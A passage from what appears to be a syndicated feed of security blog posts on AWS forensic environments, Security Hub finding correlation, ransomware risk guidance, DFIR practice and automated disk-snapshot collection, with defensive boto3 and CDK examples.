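            "Condition": {
                "StringNotLike": {"aws:PrincipalArn": ALLOWED_ROLE_ARNS}
            },
        }
    ],
}

s3.put_bucket_policy(Bucket=BUCKET, Policy=json.dumps(bucket_policy))

# Versioning helps preserve original evidence objects even if they are overwritten.
s3.put_bucket_versioning(
    Bucket=BUCKET, VersioningConfiguration={"Status": "Enabled"}
)
```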

Protecting the integrity of your forensic infrastructures

Once you’ve built the organization, account structure, and roles, you must decide on the best strategy inside the account itself. Analysis of the collected artifacts can be done through forensic analysis tools hosted on an EC2 instance, ideally residing within a dedicated Amazon VPC in the forensics account. This Amazon VPC should be configured with the same restrictive approach you’ve taken so far, being fully isolated and auditable, with the only resources being dedicated to the forensic tasks at hand.

This might mean that the Amazon VPC has no internet gateway, and therefore all S3 access must be done through an S3 VPC endpoint. VPC Flow Logs should be enabled at the Amazon VPC level so that there are records of all network traffic. Security groups should be highly restrictive, allowing only the ports that are required by the forensic tools. SSH and RDP access should be restricted and governed by auditable mechanisms, such as a bastion host configured to log all connections and activity, AWS Systems Manager Session Manager, or similar.
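A minimal sketch of such an isolated setup (hypothetical CIDR ranges, Region, and flow log bucket) might look like the following:

```python
import boto3

ec2 = boto3.client("ec2")

# Hypothetical values: Region and the S3 bucket that receives VPC Flow Logs.
REGION = "us-east-1"
FLOW_LOG_BUCKET_ARN = "arn:aws:s3:::example-forensics-flow-logs"

# Isolated VPC for forensic tooling: no internet gateway is ever attached.
vpc = ec2.create_vpc(CidrBlock="10.20.0.0/24")
vpc_id = vpc["Vpc"]["VpcId"]

subnet = ec2.create_subnet(VpcId=vpc_id, CidrBlock="10.20.0.0/26")
route_table = ec2.create_route_table(VpcId=vpc_id)
ec2.associate_route_table(
    RouteTableId=route_table["RouteTable"]["RouteTableId"],
    SubnetId=subnet["Subnet"]["SubnetId"],
)

# Record all network traffic in the VPC.
ec2.create_flow_logs(
    ResourceIds=[vpc_id],
    ResourceType="VPC",
    TrafficType="ALL",
    LogDestinationType="s3",
    LogDestination=FLOW_LOG_BUCKET_ARN,
)

# Gateway endpoint so evidence in S3 is reachable without internet access.
ec2.create_vpc_endpoint(
    VpcId=vpc_id,
    ServiceName=f"com.amazonaws.{REGION}.s3",
    VpcEndpointType="Gateway",
    RouteTableIds=[route_table["RouteTable"]["RouteTableId"]],
)
```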

If a graphical interface is required, RDP or other methods can still be used alongside Systems Manager Session Manager. Commands and responses performed using Session Manager can be logged to Amazon CloudWatch and an S3 bucket, which allows auditing of all commands executed on the forensic tooling Amazon EC2 instances. Administrative privileges can also be restricted if required. You can also arrange to receive an Amazon Simple Notification Service (Amazon SNS) notification when a new session is started.

Given that the Amazon EC2 forensic tooling instances might not have direct access to the internet, you might need to create a process to preconfigure and deploy standardized Amazon Machine Images (AMIs) with the appropriate installed and updated set of tooling for analysis. Several best practices apply around this process. The OS of the AMI should be hardened to reduce its vulnerable surface. You can do this by starting with an approved OS image, such as an AWS-provided AMI or one you have created and manage yourself. Then remove unwanted programs, packages, libraries, and other components. Ensure that all updates and patches—security and otherwise—have been applied. Configuring a host-based firewall is also a good precaution, as are host-based intrusion detection tools. In addition, always ensure the attached disks are encrypted.

If your operating system is supported, we recommend creating golden images using EC2 Image Builder. Your golden image should be rebuilt and updated at least monthly, as you want to ensure it’s kept up to date with security patches and functionality.

EC2 Image Builder—combined with other tools—facilitates the hardening process; for example, allowing the creation of automated pipelines that produce Center for Internet Security (CIS) benchmark hardened AMIs. If you don’t want to maintain your own hardened images, you can find CIS benchmark hardened AMIs on the AWS Marketplace.

Keep in mind the infrastructure requirements for your forensic tools—such as minimum CPU, memory, storage, and networking requirements—before choosing an appropriate EC2 instance type. Though a variety of instance types are available, you’ll want to ensure that you’re keeping the right balance between cost and performance based on your minimum requirements and expected workloads.

The goal of this environment is to provide an efficient means to collect evidence, perform a comprehensive investigation, and effectively return to safe operations. Evidence is best acquired through the automated strategies discussed in How to automate incident response in the AWS Cloud for EC2 instances. Hashing evidence artifacts immediately upon acquisition is highly recommended in your evidence collection process. Hashes, and in turn the evidence itself, can then be validated after subsequent transfers and accesses, ensuring the integrity of the evidence is maintained. Preserving the original evidence is crucial if legal action is taken.
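Hashing itself needs nothing more than the standard library; the following sketch (hypothetical artifact path) computes a SHA-256 digest that you can record at acquisition time and re-verify after each transfer:

```python
import hashlib

def sha256_of_file(path: str, chunk_size: int = 1024 * 1024) -> str:
    """Stream a large evidence file and return its SHA-256 hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

if __name__ == "__main__":
    # Hypothetical artifact path; record the digest alongside the evidence and
    # re-compute it after every transfer to confirm integrity.
    artifact = "/evidence/i-0123456789abcdef0-volume.img"
    print(artifact, sha256_of_file(artifact))
```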

Evidence and artifacts can consist of, but aren’t limited to, disk snapshots, memory dumps, service and application logs, and related artifacts stored in Amazon S3.

The control plane logs mentioned above—such as the CloudTrail logs—can be accessed in one of two ways. Ideally, the logs should reside in a central location with read-only access for investigations as needed. However, if not centralized, read access can be given to the original logs within the source account as needed. Read access to certain service logs found within the security account, such as AWS Config, Amazon GuardDuty, Security Hub, and Amazon Detective, might be necessary to correlate indicators of compromise with evidence discovered during the analysis.

As previously mentioned, it’s imperative to have immutable versions of all evidence. This can be achieved in many ways, including but not limited to the following examples (a short Amazon S3 sketch appears after the list below):

  • Amazon EBS snapshots, including hibernation generated memory dumps:
    • Original Amazon EBS disks are snapshotted, shared to the forensics account, used to create a volume, and then mounted as read-only for offline analysis.
  • Amazon EBS volumes manually captured:
    • Linux tools such as dc3dd can be used to stream a volume to an S3 bucket, as well as provide a hash, and the stored object can then be made immutable by using an S3 method from the next bullet point.
  • Artifacts stored in an S3 bucket, such as memory dumps and other artifacts:
    • S3 Object Lock prevents objects from being deleted or overwritten for a fixed amount of time or indefinitely.
    • Using MFA delete requires the requestor to use multi-factor authentication to permanently delete an object.
    • Amazon S3 Glacier provides a Vault Lock function if you want to retain immutable evidence long term.
  • Disk volumes:
    • Linux: Mount in read-only mode.
    • Windows: Use one of the many commercial or open-source write-blocker applications available, some of which are specifically made for forensic use.
  • CloudTrail:
    • CloudTrail log files are delivered to an S3 bucket and can be protected by using the methods above; you can also turn on CloudTrail log file integrity validation.
  • AWS Systems Manager inventory:
    • Inventory data can be aggregated to an S3 bucket by using resource data sync and protected by using the methods above.
  • AWS Config data:
    • By default, AWS Config stores data in an S3 bucket, and can be protected using the above methods.

Note: AWS Key Management Service (AWS KMS) can help you encrypt this data. AWS KMS is integrated with many AWS services to simplify using your keys to encrypt data across your AWS workloads.
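As a short sketch of the Amazon S3 options above, using hypothetical bucket and object names and noting that S3 Object Lock must be enabled on the bucket, you could set a default retention period and place a legal hold like this:

```python
import boto3

s3 = boto3.client("s3")

# Hypothetical evidence bucket (Object Lock must be enabled on the bucket) and a
# hypothetical evidence object under the legal holds prefix.
BUCKET = "example-forensics-legal-holds"
KEY = "case-0001/evidence-artifacts/i-0123456789abcdef0-volume.img"

# Default retention for new evidence objects: compliance mode for one year.
s3.put_object_lock_configuration(
    Bucket=BUCKET,
    ObjectLockConfiguration={
        "ObjectLockEnabled": "Enabled",
        "Rule": {"DefaultRetention": {"Mode": "COMPLIANCE", "Days": 365}},
    },
)

# Place a legal hold on a specific object; the hold remains until explicitly released.
s3.put_object_legal_hold(
    Bucket=BUCKET,
    Key=KEY,
    LegalHold={"Status": "ON"},
)
```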

As an example use case of Amazon EBS disks being shared as evidence to the forensics account, the following figure—Figure 2—shows a simplified S3 bucket folder structure you could use to store and work with evidence.

Figure 2 shows an S3 bucket structure for a forensic account. An S3 bucket and folder are created to hold incoming data—for example, from Amazon EBS disks—which is streamed to Incoming Data > Evidence Artifacts using dc3dd. The data is then copied from there to a folder in another bucket—Active Investigation > Root Directory > Extracted Artifacts—to be analyzed by the tooling installed on your forensic Amazon EC2 instance. There are also folders under Active Investigation for any investigation notes you make during analysis, as well as the final reports, which are discussed at the end of this blog post. Finally, there is a bucket with folders for legal holds, where an object lock is placed to hold evidence artifacts at a specific version.

Figure 2: Forensic account S3 bucket structure

Considerations

Finally, depending on the severity of the incident, your on-premises network and infrastructure might also be compromised. Having an alternative environment for your security responders to use in case of such an event reduces the chance of not being able to respond in an emergency. AWS services such as Amazon WorkSpaces—a fully managed persistent desktop virtualization service—can be used to provide your responders a ready-to-use, independent environment that they can use to access the digital forensics and incident response tools needed to perform incident-related tasks.

Aside from the investigative tools, communications services are among the most critical for coordination of response. You can use Amazon WorkMail and Amazon Chime to provide that capability independent of normal channels.

Conclusion

The goal of a forensic investigation is to provide a final report that’s supported by the evidence. This includes what was accessed, who might have accessed it, how it was accessed, whether any data was exfiltrated, and so on. This report might be necessary for legal circumstances, such as criminal or civil investigations or situations requiring breach notifications. What output each circumstance requires should be determined in advance in order to develop an appropriate response and reporting process for each. A root cause analysis is vital in providing the information required to prepare your resources and environment to help prevent a similar incident in the future. Reports should not only include a root cause analysis, but also provide the methods, steps, and tools used to arrive at the conclusions.

This article has shown you how you can get started creating and maintaining forensic environments, as well as enable your teams to perform advanced incident resolution investigations using AWS services. Implementing the groundwork for your forensics environment, as described above, allows you to use automated disk collection to begin iterating on your forensic data collection capabilities and be better prepared when security events occur.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on one of the AWS Security, Identity, and Compliance forums or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Sol Kavanagh

Sol is a senior solutions architect and CISSP with 20+ years of experience in the enterprise space. He is passionate about security and helping customers build solutions in the AWS Cloud. In his spare time he enjoys distance cycling, adventure travelling, Buddhist philosophy, and Muay Thai.

Correlate security findings with AWS Security Hub and Amazon EventBridge

Post Syndicated from Marshall Jones original https://aws.amazon.com/blogs/security/correlate-security-findings-with-aws-security-hub-and-amazon-eventbridge/

In this blog post, we’ll walk you through deploying a solution to correlate specific AWS Security Hub findings from multiple AWS services that are related to a single AWS resource, which indicates an increased possibility that a security incident has happened.

AWS Security Hub ingests findings from multiple AWS services, including Amazon GuardDuty, Amazon Inspector, Amazon Macie, AWS Firewall Manager, AWS Identity and Access Management (IAM) Access Analyzer, and AWS Systems Manager Patch Manager. Findings from each service are normalized into the AWS Security Finding Format (ASFF), so that you can review findings in a standardized format and take action quickly. You can use AWS Security Hub to provide a single view of all security-related findings, where you can set up alerting, automatic remediation, and ingestion into third-party incident management systems for specific findings.

Although Security Hub can ingest a vast number of integrations and findings, it cannot create correlation rules like a Security Information and Event Management (SIEM) tool can. However, you can create such rules using EventBridge. It’s important to take a closer look when multiple AWS security services generate findings for a single resource, because this potentially indicates elevated risk. Depending on your environment, the initial number of findings in AWS Security Hub may be high, so you may need to prioritize which findings require immediate action. AWS Security Hub natively gives you the ability to filter findings by resource, account, and many other details. With the solution in this post, when one of these correlated sets of findings is detected, a new finding is created and pushed to AWS Security Hub by using the Security Hub BatchImportFindings API operation. You can then respond to these new security incident-oriented findings through ticketing, chat, or incident management systems.

Prerequisites

This solution requires that you have AWS Security Hub enabled in your AWS account. In addition to AWS Security Hub, the following services, which generate the findings correlated in this post, must be enabled and integrated with AWS Security Hub: Amazon GuardDuty, Amazon Inspector, and Amazon Macie.

Solution overview

In this solution, you will use a combination of AWS Security Hub, Amazon EventBridge, AWS Lambda, and Amazon DynamoDB to ingest and correlate specific findings that indicate a higher likelihood of a security incident. Each correlation is focused on multiple specific AWS security service findings for a single AWS resource.
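As a rough sketch of the EventBridge piece of that architecture, with a hypothetical rule name and Lambda function ARN, you could route imported Security Hub findings from the relevant services to a correlation function like this:

```python
import json
import boto3

events = boto3.client("events")

# Hypothetical name and target: a rule that forwards imported Security Hub findings
# from GuardDuty, Inspector, and Macie to the correlation Lambda function.
RULE_NAME = "security-hub-finding-correlation"
LAMBDA_ARN = "arn:aws:lambda:us-east-1:111122223333:function:finding-correlator"

event_pattern = {
    "source": ["aws.securityhub"],
    "detail-type": ["Security Hub Findings - Imported"],
    "detail": {
        "findings": {
            "ProductFields": {
                "aws/securityhub/ProductName": ["GuardDuty", "Inspector", "Macie"]
            }
        }
    },
}

events.put_rule(
    Name=RULE_NAME,
    EventPattern=json.dumps(event_pattern),
    State="ENABLED",
    Description="Route selected Security Hub findings to the correlation function",
)

events.put_targets(
    Rule=RULE_NAME,
    Targets=[{"Id": "correlation-lambda", "Arn": LAMBDA_ARN}],
)
```

You would also need to grant EventBridge permission to invoke the function (for example, with the Lambda AddPermission API); in the deployed solution, the provided CDK code creates these resources, so this sketch is only meant to show the shape of the event pattern.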

The following list shows the correlated findings that are detected by this solution. The Description section for each finding correlation provides context for that correlation, the Remediation section provides general recommendations for remediation, and the Prevention/Detection section provides guidance to either prevent or detect one or more findings within the correlation. With the code provided, you can also add more correlations than those listed here by modifying the AWS Cloud Development Kit (AWS CDK) code and AWS Lambda code. The Solution workflow section breaks down the flow of the solution. If you choose to implement automatic remediation, each finding correlation will be created with the following AWS Security Finding Format (ASFF) fields:

- Severity: CRITICAL
- ProductArn: arn:aws:securityhub:<REGION>:<AWS_ACCOUNT_ID>:product/<AWS_ACCOUNT_ID>/default
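For reference, a minimal sketch of importing one such finding with the BatchImportFindings API, using hypothetical account, Region, and instance values, might look like the following:

```python
import boto3
from datetime import datetime, timezone

securityhub = boto3.client("securityhub")

# Hypothetical values for the account, Region, and affected resource.
ACCOUNT_ID = "111122223333"
REGION = "us-east-1"
INSTANCE_ARN = f"arn:aws:ec2:{REGION}:{ACCOUNT_ID}:instance/i-0123456789abcdef0"
now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.%fZ")

finding = {
    "SchemaVersion": "2018-10-08",
    "Id": f"correlated-finding/{INSTANCE_ARN}",
    "ProductArn": f"arn:aws:securityhub:{REGION}:{ACCOUNT_ID}:product/{ACCOUNT_ID}/default",
    "GeneratorId": "security-finding-correlation",
    "AwsAccountId": ACCOUNT_ID,
    "Types": ["TTPs/Command and Control"],
    "CreatedAt": now,
    "UpdatedAt": now,
    "Severity": {"Label": "CRITICAL"},
    "Title": "Correlated findings detected for EC2 instance",
    "Description": "GuardDuty backdoor activity and critical Inspector CVEs "
                   "were found for the same EC2 instance.",
    "Resources": [{"Type": "AwsEc2Instance", "Id": INSTANCE_ARN}],
}

response = securityhub.batch_import_findings(Findings=[finding])
print(response["SuccessCount"], "finding(s) imported")
```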

These correlated findings are created as part of this solution:

  1. Any Amazon GuardDuty Backdoor findings and three critical common vulnerabilities and exposures (CVEs) from Amazon Inspector that are associated with the same Amazon Elastic Compute Cloud (Amazon EC2) instance.
    • Description: Amazon Inspector has found at least three critical CVEs on the EC2 instance. CVEs indicate that the EC2 instance is currently vulnerable or exposed. The EC2 instance is also performing backdoor activities. The combination of these two findings is a stronger indication of an elevated security incident.
    • Remediation: It’s recommended that you isolate the EC2 instance and follow standard protocol to triage the EC2 instance to verify if the instance has been compromised. If the instance has been compromised, follow your standard Incident Response process for post-instance compromise and forensics. Redeploy a backup of the EC2 instance by using an up-to-date hardened Amazon Machine Image (AMI) or apply all security-related patches to the redeployed EC2 instance.
    • Prevention/Detection: To mitigate or prevent an Amazon EC2 instance from missing critical security updates, consider using AWS Systems Manager Patch Manager to automate installing security-related patches for managed instances. Alternatively, you can provide developers with up-to-date hardened Amazon Machine Images (AMIs) by using Amazon EC2 Image Builder. For detection, you can set the AMI property called 'DeprecationTime' to indicate when the AMI will become outdated, and respond accordingly.
  2. An Amazon Macie sensitive data finding and an Amazon GuardDuty S3 exfiltration finding for the same Amazon Simple Storage Service (Amazon S3) bucket.
    • Description: Amazon Macie has scanned an Amazon S3 bucket and found a possible match for sensitive data. Amazon GuardDuty has detected a possible exfiltration finding for the same Amazon S3 bucket. The combination of these findings indicates a higher risk security incident.
    • Remediation: It’s recommended that you review the source IP and/or IAM principal that is making the S3 object reads against the S3 bucket. If the source IP and/or IAM principal is not authorized to access sensitive data within the S3 bucket, follow your standard Incident Response process for post-compromise response to S3 exfiltration. For example, you can restrict an IAM principal’s permissions, revoke existing credentials or unauthorized sessions, restrict access through the Amazon S3 bucket policy, or use the Amazon S3 Block Public Access feature.
    • Prevention/Detection: To mitigate or prevent exposure of sensitive data within Amazon S3, ensure that the Amazon S3 buckets use least-privilege bucket policies and are not publicly accessible. Alternatively, you can use the Amazon S3 Block Public Access feature (see the sketch after this list). Review your AWS environment to make sure you are following Amazon S3 security best practices. For detection, you can use AWS Config to track and automatically remediate Amazon S3 buckets that do not have logging and encryption enabled or that are publicly accessible.
  3. AWS Security Hub detects an EC2 instance with a public IP and unrestricted VPC Security Group; Amazon GuardDuty unusual network traffic behavior finding; and Amazon GuardDuty brute force finding.
    • Description: AWS Security Hub has detected an EC2 instance that has a public IP address attached and a VPC Security Group that allows traffic for ports outside of ports 80 and 443. Amazon GuardDuty has also determined that the EC2 instance has multiple brute force attempts and is communicating with a remote host on an unusual port that the EC2 instance has not previously used for network communication. The correlation of these lower-severity findings indicates a higher-severity security incident.
    • Remediation: It’s recommended that you isolate the EC2 instance and follow standard protocol to triage the EC2 instance to verify if the instance has been compromised. If the instance has been compromised, follow your standard Incident Response process for post-instance compromise and forensics.
    • Prevention/Detection: To mitigate or prevent these events from occurring within your AWS environment, determine whether the EC2 instance requires a public-facing IP address, and review whether the VPC security group(s) have only the required rules configured. Review your AWS environment to make sure you are following Amazon EC2 best practices. For detection, consider implementing AWS Firewall Manager to continuously audit and limit VPC security groups.
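
As a concrete example of the Amazon S3 Block Public Access remediation referenced in the second correlation, the following is a minimal Boto3 sketch; the bucket name is a placeholder.

import boto3

s3 = boto3.client("s3")

def block_public_access(bucket_name):
    """Turn on all four S3 Block Public Access settings for a bucket."""
    s3.put_public_access_block(
        Bucket=bucket_name,
        PublicAccessBlockConfiguration={
            "BlockPublicAcls": True,
            "IgnorePublicAcls": True,
            "BlockPublicPolicy": True,
            "RestrictPublicBuckets": True,
        },
    )

block_public_access("example-sensitive-data-bucket")  # placeholder bucket name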

The solution workflow, shown in Figure 1, is as follows:

  1. Security Hub ingests findings from integrated AWS security services.
  2. An EventBridge rule is invoked based on Security Hub findings in GuardDuty, Macie, Amazon Inspector, and Security Hub security standards.
  3. The EventBridge rule invokes a Lambda function to store the Security Hub finding, which is passed via EventBridge, in a DynamoDB table for further analysis.
  4. After the new findings are stored in DynamoDB, a second Lambda function is invoked by using DynamoDB Streams. A time-to-live (TTL) attribute on the table deletes finding entries that are older than 30 days.
  5. The second Lambda function looks at the resource associated with the new finding entry in the DynamoDB table and checks for other specific Security Hub findings that are associated with the same resource (a simplified sketch of this check follows Figure 1).
Figure 1: Architecture diagram describing the flow of the solution
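
The correlation check in step 5 can be as simple as querying a table keyed by resource. The following is a minimal sketch, assuming a DynamoDB table whose partition key is the resource ARN and whose sort key is a finding type; the table name and attribute names are illustrative, not the solution's actual schema.

import boto3
from boto3.dynamodb.conditions import Key

dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table("SecurityFindings")  # illustrative table name

def findings_for_resource(resource_arn):
    """Return all stored findings recorded for a single resource."""
    response = table.query(KeyConditionExpression=Key("ResourceArn").eq(resource_arn))
    return response["Items"]

def is_correlated(resource_arn, required_types):
    """Check whether the resource has findings from every required source."""
    types_seen = {item["FindingType"] for item in findings_for_resource(resource_arn)}
    return required_types.issubset(types_seen)

# Example: GuardDuty backdoor activity plus critical Inspector CVEs on one EC2 instance
if is_correlated("arn:aws:ec2:us-east-1:111122223333:instance/i-1234567890abcdef0",
                 {"GuardDutyBackdoor", "InspectorCriticalCVE"}):
    print("Correlated findings detected; create a new Security Hub finding")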

Solution deployment

You can deploy the solution through either the AWS Management Console or the AWS Cloud Development Kit (AWS CDK).

To deploy the solution by using the AWS Management Console

In your account, launch the AWS CloudFormation template by choosing the following Launch Stack button. It will take approximately 10 minutes for the CloudFormation stack to complete.
Select the Launch Stack button to launch the template

To deploy the solution by using the AWS CDK

You can find the latest code in the aws-security GitHub repository where you can also contribute to the sample code. The following commands show how to deploy the solution by using the AWS CDK. First, the CDK initializes your environment and uploads the AWS Lambda assets to Amazon S3. Then, you can deploy the solution to your account. For <INSERT_AWS_ACCOUNT>, specify the account number, and for <INSERT_REGION>, specify the AWS Region that you want the solution deployed to.

cdk bootstrap aws://<INSERT_AWS_ACCOUNT>/<INSERT_REGION>

cdk deploy

Conclusion

In this blog post, we walked through a solution that uses AWS services, including Amazon EventBridge, AWS Lambda, and Amazon DynamoDB, to correlate AWS Security Hub findings from multiple AWS security services. The solution provides a framework to prioritize specific sets of findings that indicate a higher likelihood that a security incident has occurred, so that you can prioritize and improve your security response.

If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the AWS Security Hub forum.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Marshall Jones

Marshall is a worldwide security specialist solutions architect at AWS. His background is in AWS consulting and security architecture, focused on a variety of security domains including edge, threat detection, and compliance. Today, he is focused on helping enterprise AWS customers adopt and operationalize AWS security services to increase security effectiveness and reduce risk.

Author

Jonathan Nguyen

Jonathan is a shared delivery team senior security consultant at AWS. His background is in AWS security, with a focus on threat detection and incident response. He helps enterprise customers develop a comprehensive AWS security strategy, deploy security solutions at scale, and train customers on AWS security best practices.

Introducing the Ransomware Risk Management on AWS Whitepaper

Post Syndicated from Temi Adebambo original https://aws.amazon.com/blogs/security/introducing-the-ransomware-risk-management-on-aws-whitepaper/

AWS recently released the Ransomware Risk Management on AWS Using the NIST Cyber Security Framework (CSF) whitepaper. This whitepaper aligns National Institute of Standards and Technology (NIST) recommendations for security controls related to ransomware risk management with workloads built on AWS. The whitepaper maps the technical capabilities to AWS services and implementation guidance. While this whitepaper is primarily focused on managing the risks associated with ransomware, the security controls and AWS services outlined are consistent with general security best practices.

The National Cybersecurity Center of Excellence (NCCoE) at NIST has published Practice Guides (NIST 1800-11, 1800-25, and 1800-26) to demonstrate how organizations can develop and implement security controls to combat the data integrity challenges posed by ransomware and other destructive events. Each of the Practice Guides includes a detailed set of goals that are designed to help organizations establish the ability to identify, protect, detect, respond, and recover from ransomware events.

The Ransomware Risk Management on AWS Using the NIST Cyber Security Framework (CSF) whitepaper helps AWS customers confidently meet the goals of the Practice Guides in the following categories:

Identify and protect

  • Identify systems, users, data, applications, and entities on the network.
  • Identify vulnerabilities in enterprise components and clients.
  • Create a baseline for the integrity and activity of enterprise systems in preparation for an unexpected event.
  • Create backups of enterprise data in advance of an unexpected event.
  • Protect these backups and other potentially important data against alteration.
  • Manage enterprise health by assessing machine posture.

Detect and respond

  • Detect malicious and suspicious activity generated on the network by users, or from applications that could indicate a data integrity event.
  • Mitigate and contain the effects of events that can cause a loss of data integrity.
  • Monitor the integrity of the enterprise for detection of events and after-the-fact analysis.
  • Use logging and reporting features to speed response time for data integrity events.
  • Analyze data integrity events for the scope of their impact on the network, enterprise devices, and enterprise data.
  • Analyze data integrity events to inform and improve the enterprise’s defenses against future attacks.

Recover

  • Restore data to its last known good configuration.
  • Identify the correct backup version (free of malicious code and data for data restoration).
  • Identify altered data, as well as the date and time of alteration.
  • Determine the identity/identities of those who altered data.

To achieve these goals, the Practice Guides outline a set of technical capabilities that should be established, and provide a mapping between each generic application capability and the security controls that it provides.

AWS services can be mapped to these technical capabilities, as outlined in the Ransomware Risk Management on AWS Using the NIST Cyber Security Framework (CSF) whitepaper. AWS offers a comprehensive set of services that customers can implement to establish the necessary technical capabilities to manage the risks associated with ransomware. By following the mapping in the whitepaper, AWS customers can identify which services, features, and functionality can help their organization identify, protect against, detect, respond to, and recover from ransomware events. If you’d like additional information about cloud security at AWS, please contact us.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Temi Adebambo

Temi is the Senior Manager for the America’s Security and Network Solutions Architect team. His team is focused on working with customers on cloud migration and modernization, cybersecurity strategy, architecture best practices, and innovation in the cloud. Before AWS, he spent over 14 years as a consultant, advising CISOs and security leaders.

Cybersecurity as Digital Detective Work: DFIR and Its 3 Key Components

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2021/09/03/cybersecurity-as-digital-detective-work-dfir-and-its-3-key-components/

Thanks to CSI and the many other crime-solving shows that have grasped our collective imagination for decades, we’re all at least somewhat familiar with the field of forensics and its unique appeal. At some point, anyone who’s watched these series has probably envisioned themselves in the detective’s shoes, piecing together the puzzle of a crime scene based on clues others might overlook — and bringing bad guys to justice at the end.

Cybersecurity lends itself particularly well to this analogy. It takes an expert eye and constant vigilance to stay a step ahead of the bad actors of the digital world. And after all, there aren’t many other areas in the modern tech landscape where the matter at hand is actual crime.

Digital forensics and incident response (DFIR) brings detective-like skills and processes to the forefront of cybersecurity practice. But what does DFIR entail, and how does it fit into your organization’s big-picture incident detection and response (IDR) approach? Let’s take a closer look.

What is DFIR — and are you already doing it?

Security expert Scott J. Roberts defines DFIR as “a multidisciplinary profession that focuses on identifying, investigating, and remediating computer-network exploitation.” If you hear that definition and think, “Hey, we’re already doing that,” that may be because, in some sense, you already are.

Perhaps the best way to think of DFIR is not as a specific type of tech or category of tools, but rather as a methodology and a set of practices. Broadly speaking, it’s a field within the larger landscape of cybersecurity, and it can be part of your team’s incident response approach in the context of the IDR technology and workflows you’re already using.

To be good at cybersecurity, you have to be something of a detective — and the detective-like elements of the security practice, like log analysis and incident investigation, fit nicely within the DFIR framework. That means your organization is likely already practicing DFIR at some level, even though you might not have the full picture in place just yet.

3 key components of DFIR

The question is, how do you go from doing some DFIR practices piecemeal to a more integrated approach? And what are the benefits when you do it well? Here are 3 key components of a well-formulated DFIR practice.

1. Multi-system forensics

One of the hallmarks of DFIR is the ability to monitor and query all critical systems and asset types for indications of foul play. Roberts breaks this down into a few core functions, including file-system forensics, memory forensics, and network forensics. Each of these involves monitoring activity for signs of an attack on the system in question.

He also includes log analysis in this category. Although this is largely a tool-driven process these days, a SIEM or detection-and-response solution like InsightIDR can help teams keep on top of their logs and respond to the alerts that really matter.

2. Attack intelligence

Like a detective scouring the scene of a crime for that one clue that cracks the case, spotting suspicious network activity means knowing what to look for. There’s a reason why the person who solves the crime on our favorite detective shows is rarely the rookie and more often the grizzled veteran — a keen interpretative eye is formed by years of practice and skill-building.

For the practice of DFIR, this means developing the ability to think like an attacker, not only so you can identify and fix vulnerabilities in your own systems, but so that you can also spot the signs they’ve been exploited — if and when that happens. A pentesting tool like Metasploit provides a critical foundation for practicing DFIR with a high level of precision and insight.

3. Endpoint visibility

It’s no secret there are now more endpoints in corporate networks than ever before. The huge uptick in remote work during the COVID-19 pandemic has only increased the number and types of devices accessing company data and applications.

To do DFIR well in this context, security teams need visibility into this complex system of endpoints — and a way to clearly organize and interpret data gathered from them. A tool like Velociraptor can be critical in this effort, helping teams quickly collect and view digital forensic evidence from all of their endpoints, as well as proactively monitor them for suspicious activity.

A team effort

The powerful role open-source tools like Metasploit and Velociraptor can have in DFIR reminds us that incident response is a collaborative effort. Joining forces with other like-minded practitioners across the industry helps detection-and-response teams more effectively spot and stop attacks.

Velociraptor has launched a friendly competition to encourage knowledge-sharing within the field of DFIR. They’re looking for useful content and extensions to their open-source platform, with cash prizes for those that come up with submissions that add the most value and the best capabilities. The deadline is September 20, 2021, and there’s $5,000 on the line for the top entry.

Go head-to-head with other digital detectives

Submit to the 2021 Velociraptor Contributor Competition

How to automate forensic disk collection in AWS

Post Syndicated from Matt Duda original https://aws.amazon.com/blogs/security/how-to-automate-forensic-disk-collection-in-aws/

In this blog post you’ll learn about a hands-on solution you can use for automated disk collection across multiple AWS accounts. This solution will help your incident response team set up an automation workflow to capture the disk evidence they need to analyze to determine scope and impact of potential security incidents. This post includes AWS CloudFormation templates and all of the required AWS Lambda functions, so you can deploy this solution in your own environment. This post focuses primarily on two sources as the origination of the evidence collection workflow: AWS Security Hub and Amazon GuardDuty.

Why is automating forensic disk collection important?

AWS offers unique scaling capabilities in our compute environments. As you begin to increase your number of compute instances across multiple AWS accounts or organizations, you will find operational aspects of your business that must also scale. One of these critical operational tasks is the ability to quickly gather forensically sound disk and memory evidence during a security event.

During a security event, your incident response (IR) team must be able to collect and analyze evidence quickly while maintaining accuracy for the time period surrounding the event. It is both challenging and time consuming for the IR team to manually collect all of the relevant evidence in a cloud environment, across a large number of instances and accounts. Additionally, manual collection requires time that could otherwise be spent analyzing and responding to an event. Every role assumption, every console click, and every manual trigger required by the IR team, adds time for an attacker to continue to work through systems to meet their objectives.

Indicators of compromise (IoCs) are pieces of data that IR teams often use to identify potential suspicious activity within networks that might need further investigation. These IoCs can include file hashes, domains, IP addresses, or user agent strings. IoCs are used by services such as GuardDuty to help you discover potentially malicious activity in your accounts. For example, when you are alerted that an Amazon Elastic Compute Cloud (Amazon EC2) instance contains one or more IoCs, your IR team must gather a point-in-time copy of relevant forensic data to determine the root cause, and evaluate the likelihood that the finding requires action. This process involves gathering snapshots of any and all attached volumes, a live dump of the system’s memory, a capture of the instance metadata, and any logs that relate to the instance. These sources help your IR team to identify next steps and work towards a root cause.

It is important to take a point-in-time snapshot of an instance as close in time to the incident as possible. If there is a delay in capturing the snapshot, the evidence can be altered or rendered unusable, because the data has changed or been deleted. To take this snapshot quickly, you need a way to automate the collection and delivery of potentially hundreds of disk images, while ensuring each snapshot is collected in the same way and without creating a bottleneck in the pipeline that could reduce the integrity of the evidence. In this blog post, I explain the details of the automated disk collection workflow, and explain why you might make different design decisions. You can download the solutions in CloudFormation, so that you can deploy this solution and get started on your own forensic automation workflows.
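
As a simple illustration of the point-in-time capture step, which the solution later automates inside a Lambda function, the following is a minimal Boto3 sketch that snapshots every EBS volume attached to a suspect instance; the instance ID and incident ID are placeholders.

import boto3

ec2 = boto3.client("ec2")

def snapshot_attached_volumes(instance_id, incident_id):
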